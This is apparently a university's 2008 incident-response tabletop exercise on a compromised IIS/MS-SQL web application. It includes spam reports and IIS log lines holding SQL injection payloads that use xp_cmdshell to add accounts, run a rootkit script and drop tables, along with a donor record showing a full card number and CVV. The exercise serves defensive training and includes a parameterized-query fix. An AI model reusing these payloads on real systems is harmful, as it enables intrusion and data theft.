Windows Incident Handling Table Top Exercise
January 9, 2008
Policies, Policies, Policies
and Procedures
Information Technology Resource Use Policy 6460c
Effective Date: Nov. 3, 1997
http://www.boisestate.edu/policy/index.asp?section=6&policynum=6460
Information Privacy and Security Policy 6466a
Effective Date: Dec. 22, 2006
http://www.boisestate.edu/policy/index.asp?section=6&policynum=6466
Incident Response Procedure
Effective Date: Dec. 22, 2006 (under review)
http://boisestate.edu/oit/iso/IncidentResponseProcedureBSU.html
Incident Response Policy (under review)
http://boisestate.edu/oit/iso/incResponsePolicy.html
Data Classification Standard (under review)
http://boisestate.edu/oit/iso/DataClassificationStandardBSU.html
Drafts of IT Policy Available for Comment
http://boisestate.edu/oit/iso
Events or Incidents?
An event is any observable occurrence in a system or network.
An incident can be thought of as a violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices.
--NIST Computer Security Incident Handling Guide (sp800-61)
Incident Handling Process
Preparation: also prevention
Identification: what has happened/is happening & why
Containment: keep the problem from spreading
Eradication: remove the problem
Recovery: return the affected server/service to production
Lessons Learned: discuss what went well and not so well to do better next time
Adapted from NIST, SANS, ITIL
Medium size, pretty well funded college in MRUD
Ten Windows servers; Linux and Mac, too
All Windows servers are 2003 with the latest SP, current on patches, current and up-to-date AV
Part of MRUD AD domain
Some Windows servers are fresh installs, some are upgrades from Win2k
Six IIS servers
Two IIS servers have FP 2003 extensions
One FP virtual server for each dept and some associate college and dept activities
Two MS-SQL servers
One SQL server is backend for various home-grown dept web applications
Innovative, entrepreneurial faculty
Use many student employees and "helpers" to set up web sites and web applications
>>> David Hawley <[email protected]> 3/14/2007 9:01 AM >>>
To Whom It May Concern, I received the attached sexual spam from someone at your university. I'm letting you know because I'm sure you do not want your University to be joined in any lawsuit that may come out of this activity. David Hawley
-----Forwarded Message-----
From: [email protected]
Sent: Mar 14, 2007 5:54 AM
To: Xqzme2
Subject: Greetings !!!
Hello ours dear member!.
Thank you for using our services! Now we represent new unique 2 sites for you. Believe, this site will not leave you cold! Just exclusive high definition quality video. Only best for you! To your good health and prosperity! Thanks for attention!
If you love young innocent bodies CLICK HERE. If you love skilled and mature CLICK HERE.
P.S. All our members get free unlimited BONUS ACCESS to many another perfect sites!
not sure what to do with this...
From: Average User
To: [email protected]
Date: 5/10/2007 10:19 AM
Subject: Fwd: Illegal content
This email does not look like it came from a reliable source. We did not open the links and are deleting this but I thought it would be good to forward on to OIT.
Thanks,
Average
From: "Uwe Packer" <[email protected]>
To: <[email protected]>, <[email protected]>, <[email protected]>
Date: 5/9/2007 10:34 PM
Subject: Illegal content
Unfortunately I have to report that your IT services are being misused for spamming and drug sales. Would you please upgrade your security and stop this content from being distributed to minors.
Uwe
Sample post received:
May 10, 2007 at 05:22:18 propecia ([email protected])
http://modlang.boisestate.edu/_s297board/000009a5.htm
Hi! propecia [url=http://modlang.boisestate.edu/_s297board/000009a5.htm]propecia[/url] Welcome!
===
May 10, 2007 at 02:04:31 Tadalafil ([email protected])
http://modlang.boisestate.edu/_s297board/000009a4.htm?tadalafil
Hi! tadalafil as [url=http://modlang.boisestate.edu/_s297board/000009a4.htm?tadalafil]tadalafil as[/url] Waiting for you!
From: Help Desk
To: User, Average
Date: 5/10/2007 11:02 AM
Subject: Re: Fwd: Illegal content
Hi Average,
Yes, this is a spam email. Please delete. In the future you may also forward spam emails as attachments to [email protected]
Thank you,
Techy
From: Simon Brady <[email protected]>
To: <[email protected]>
Date: 5/13/2007 4:12 AM
Subject: Compromised Boise State website
Hi folks,
A web bulletin board run by your Modern Languages and Literatures Faculty appears to have been taken over by spammers:
http://modlang.boisestate.edu/s297board_frm.htm
Could you please pass this on to your IT security staff?
Thanks,
Simon
Site is a web forum that anyone can post to.... no username/password required.
Main site: http://modlang.boisestate.edu/webspanish/s297boardhome.htm
The main modlang site does not even seem to have a link to this forum so I'm not sure how someone would navigate to it... but all the same there are several posts from the last few days that have inappropriate wording.
[Chart residue; only the axes survive: days Tuesday through Friday, times 6:00 a / Noon / 6:00 p, vertical scale 0 to 120]
> From: "ernie nicholas" <[email protected]>
> Date: June 4, 2007 12:17:41 PM MDT
> To: [email protected]
> Subject: spam page
>
> Hello,
>
> The following page links to spam:
> http://www.boisestate.edu/malville/maincontent.asp?page=bgdubscr
>
> thanks
**********************************************
> From: "john smith" <[email protected]>
> Date: June 8, 2007 12:17:41 PM MDT
> To: [email protected]
> Subject: spam page
>
> Hello,
>
> The following page links to spam:
> http://www.boisestate.edu/malville/maincontent.asp?page=uhlffmhy
>
> thanks
**********************************************
> From: "bob carol" <[email protected]>
> Date: June 10, 2007 2:27:31 AM MDT
> To: [email protected]
> Subject: spam page
>
> Hello,
>
> The following page links to spam:
> http://www.boisestate.edu/malville/maincontent.asp?page=bzvetcps
>
> thanks
***********************************************
> From: "ted nalice" <[email protected]>
> Date: June 14, 2007 11:12:45 PM MDT
> To: [email protected]
> Subject: spam page
>
> Hello,
>
> The following page links to spam:
> http://www.boisestate.edu/malville/maincontent.asp?page=bgdubscr
>
> thanks
2007-05-18 18:36:44 132.178.236.60 GET /malville/maincontent.asp page=Policies'%3BINSERT+INTO+OTHERPAGES+(PAGE,CONTENT)+VALUES+(CHAR(117)%2BCHAR(104)%2BCHAR(108)%2BCHAR(102)%2BCHAR(102)%2BCHAR(109)%2BCHAR(104)%2BCHAR(121),SPACE(0))%2D%2D 80 - 83.222.16.60 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0
This translates to a SQL INSERT command that loads an entry and a script, “uhlffmhy”, into the “OtherPages” table. Then a URL like this
http://www.boisestate.edu/malville/maincontent.asp?page=uhlffmhy
redirects to an on-line pharmaceutical site.
2007-05-21 09:24:11 132.178.236.60 GET /malville/maincontent.asp page=bzvetcps' and 1=1;declare @cmd varÐset @cmd = start wscript upwroot.vbs //BEXEC MASTER..XP_CMDSHELL @cmd;-- and '1'='1 80 - 202.96.182.225 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506) 200 0 0
This injection used the Malville database to upload and run a Visual Basic script that installed a rootkit after running 11 previous SQL commands to prepare the database for the script. Symantec Anti-virus did not mark or alert on the trojan programs installed by the rootkit. The rootkit then allowed remote access to the server.
2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr%27%3B%44%72%6F%70%20%74%61%62%6C%65%20%63%6F%6D%64%5F%6C%69%73%74%20%3B%43%52%45%41%54%45%20%54%41%42%4C%45%20%63%6F%6D%64%5F%6C%69%73%74%20%28%43%6F%6D%52%65%73%75%6C%74%20%6E%76%61%72%63%68%61%72%28%31%30%30%30%29%29%20%49%4E%53%45%52%54%20%63%6F%6D%64%5F%6C%69%73%74%20%45%58%45%43%20%4D%41%53%54%45%52%2E%2E%78%70%5F%63%6D%64%73%68%65%6C%6C%20%22%6E%65%74%20%75%73%65%72%20%72%6F%79%20%31%32%33%20%2F%61%64%64%22%2D%2D 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0 0
2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr';Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell "net user roy 123 /add"-- 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0
Mix of text and hex sent to the database:
2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE%20TABLE%20[X_6691]([id]%20int%20NOT%20NULL%20IDENTITY%20(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL);insert%20into%20[X_6691](ResultTxt)%20exec%20master..xp_cmdshell%20'net%20user%20iisadmin%20admin%20/add';insert%20into%20[X_6691]%20values%20('g_over');exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64
Translated:
2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE TABLE [X_6691]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_6691](ResultTxt) exec master..xp_cmdshell 'net user iisadmin admin /add';insert into [X_6691] values ('g_over');exec master..sp_dropextendedproc 'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64
How did this happen?
Still, the attacker shouldn't have gotten as far as he/she did!
Just a faculty member's pet project.
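The source of maincontent.asp is not on the slides, so the following is a hypothetical reconstruction of the ?page= lookup pattern, written in Python against an in-memory sqlite3 database rather than classic ASP against MS-SQL; it is an added example, not the project's code. The vulnerable version concatenates the page name into the SQL text and runs it as a batch, which is exactly why the 2007-05-18 request's trailing ';INSERT ... --' could add the "uhlffmhy" row; the hardened version binds the page name as a parameter and the same input matches nothing. The table, the row and the INJECTED_PAGE string are constructed for the example.

```python
"""The ?page= lookup behind maincontent.asp, vulnerable and parameterized.
Hypothetical reconstruction in Python/sqlite3; the real page was classic ASP
against MS-SQL and its source is not on the slides."""
import sqlite3

# Constructed: the page value from the 2007-05-18 request with the CHAR()
# encoding already resolved. A ';'-separated batch runs every statement, and
# the trailing '--' comments out whatever the application appends.
INJECTED_PAGE = "Policies';INSERT INTO OtherPages (page, content) VALUES ('uhlffmhy','');--"


def make_db():
    """In-memory stand-in for the Malville database with one OtherPages row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE OtherPages (page TEXT PRIMARY KEY, content TEXT)")
    conn.execute("INSERT INTO OtherPages VALUES ('Policies', 'Campus policies page')")
    conn.commit()
    return conn


def pages(conn):
    """Sorted list of page names currently in OtherPages."""
    return sorted(r[0] for r in conn.execute("SELECT page FROM OtherPages"))


def lookup_vulnerable(conn, page):
    """String concatenation. executescript() is used on purpose: it executes
    every statement in the text, as SQL Server does with the batch the ASP
    page hands it. The SELECT's rows are discarded; the side effect on the
    table is what matters, so the table contents afterwards are returned."""
    sql = "SELECT content FROM OtherPages WHERE page = '" + page + "'"
    conn.executescript(sql)
    return pages(conn)


def lookup_safe(conn, page):
    """Parameterized query: the page name is bound as data, so its quote,
    semicolon and comment characters never reach the parser as syntax."""
    row = conn.execute("SELECT content FROM OtherPages WHERE page = ?",
                       (page,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print("vulnerable:", lookup_vulnerable(make_db(), INJECTED_PAGE))
    db = make_db()
    print("safe:", lookup_safe(db, INJECTED_PAGE), pages(db))
```

Parameterization closes the injection itself; the later log lines show why it is not the whole fix. The batches that reached xp_cmdshell and "net user" succeeded because the application's database login had the rights to run them, so the web application's SQL account should be a low-privilege login that cannot execute extended stored procedures or create tables.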
Tables in the Malville Database:
The usual system tables and:
Checklist, CrossReferences, Feedback, OtherPages, Contributors
For display purposes, this row from the Contributors table is shown with its columns listed vertically:
id        500
name      Thomas Smith
address   1492 Columbus Dr.
city      Hope
state     ID
zip       83666
hphone    2088769821
posit     Marketing Director
empl      Coldwater Creek
wphone    2088353009
email     [email protected]
phoneDrive
amount    750
cc        mc
ccname    Thomas L. Smith
ccnum     4857349832681896
ccexp     10/10/2010
cvv       430
alum      yes
assn      yes
gyear     1993
degree    BS
major     mktFin
spouse    Mary
OK! You've identified the problem. How do you keep it from getting worse?
How do you remove the pestilence?
How and when do you get the server back in business?
Time to go home!
Thanks!